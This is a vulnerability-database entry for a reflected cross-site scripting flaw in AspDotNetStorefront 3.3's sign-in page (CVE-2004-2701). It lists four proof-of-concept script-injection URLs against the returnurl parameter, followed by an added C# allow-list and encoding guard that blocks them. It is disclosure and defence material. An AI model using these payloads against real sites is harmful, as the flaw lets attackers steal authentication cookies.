AspDotNetStorefront ReturnURL Parameter Cross-Site Scripting Vulnerability

Vulnerability ID: 1107987 | Vulnerability type: Cross-site scripting
Published: 2004-06-09 | Updated: 2007-10-09
CVE ID: CVE-2004-2701 | CNNVD-ID: CNNVD-200412-1029
Platform: ASP | CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/24185
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1029
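|Vulnerability details
signin.aspx in AspDotNetStorefront 3.3 contains a cross-site scripting (XSS) vulnerability. A remote attacker can inject arbitrary web script or HTML via the returnurl parameter.
|Exploit (EXP)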
source: http://www.securityfocus.com/bid/10507/info

AspDotNetStorefront is prone to a cross-site scripting vulnerability. This issue exists due to insufficient sanitization of user-supplied data. The problem presents itself in the 'returnurl' parameter of the 'signin.aspx' script of the application and can allow remote attackers to steal cookie-based authentication credentials and carry out other attacks.

AspDotNetStorefront 3.3 is reportedly affected by this issue; however, it is possible that other versions are affected as well.

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=1"style="background:url(javascript:alert('Vulnerable_To_XSS'))"%20"

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=--><script>alert('Vulnerable_To_XSS')</script>

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"><script>alert("Vulnerable_To_XSS")</script>

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"'><img%20src="javascript:alert('Vulnerable_To_XSS')">
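
A defensive handling of the 'returnurl' value, shown as an added example that is not AspDotNetStorefront's code and not part of the original advisory: the value is checked against an allow-list of site-relative paths and is HTML-encoded before it is written into an attribute. Assumptions: the page echoes the value into a hidden form field, and the names `ReturnUrlGuard`, `default.aspx` and the benign sample `orders.aspx?id=42` are hypothetical.

```csharp
using System;
using System.Net;
using System.Text.RegularExpressions;

public static class ReturnUrlGuard
{
    // Assumed landing page used when the value is rejected (hypothetical name).
    const string Fallback = "default.aspx";

    // Allow-list: site-relative path plus an optional simple query string.
    // \z (not $) so a trailing newline cannot slip through.
    static readonly Regex LocalPath = new Regex(
        @"^[A-Za-z0-9_\-./]+(\?[A-Za-z0-9_\-.=&%]*)?\z",
        RegexOptions.CultureInvariant);

    // 'returnUrl' is the value as the framework hands it over (already URL-decoded).
    public static string Validate(string returnUrl)
    {
        if (string.IsNullOrEmpty(returnUrl)) return Fallback;
        // Quotes, angle brackets, colons and whitespace never match the allow-list;
        // "//host" is refused so the value cannot point off-site.
        if (!LocalPath.IsMatch(returnUrl) || returnUrl.StartsWith("//", StringComparison.Ordinal))
            return Fallback;
        return returnUrl;
    }

    // Encode for the HTML attribute context even after validation.
    public static string RenderHiddenField(string returnUrl)
    {
        return "<input type=\"hidden\" name=\"returnurl\" value=\""
             + WebUtility.HtmlEncode(Validate(returnUrl)) + "\">";
    }

    public static void Main()
    {
        // Decoded forms of the four advisory values, then one benign value (constructed).
        string[] samples = {
            "1\"style=\"background:url(javascript:alert('Vulnerable_To_XSS'))\" \"",
            "--><script>alert('Vulnerable_To_XSS')</script>",
            ">\"><script>alert(\"Vulnerable_To_XSS\")</script>",
            ">\"'><img src=\"javascript:alert('Vulnerable_To_XSS')\">",
            "orders.aspx?id=42"
        };
        foreach (string s in samples)
            Console.WriteLine(RenderHiddenField(s));
    }
}
```

The four advisory values fail the allow-list and are replaced by the fallback; only the benign value is rendered as supplied.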
|References

Source: XF
Name: aspdotnetstorefront-signin-xss(16426)
Link: http://xforce.iss.net/xforce/xfdb/16426
Source: BID
Name: 10507
Link: http://www.securityfocus.com/bid/10507
Source: SECUNIA
Name: 11839
Link: http://secunia.com/advisories/11839
Source: FULLDISC
Name: 20040609 [FULLDISCLOSURE] ASPDOTNETSTOREFRONT Cross-Site Scripting Vulnerability
Link: http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0229.html
Source: BUGTRAQ
Name: 20040609 [FULLDISCLOSURE] ASPDOTNETSTOREFRONT Cross-Site Scripting Vulnerability
Link: http://archives.neohapsis.com/archives/bugtraq/2004-06/0129.html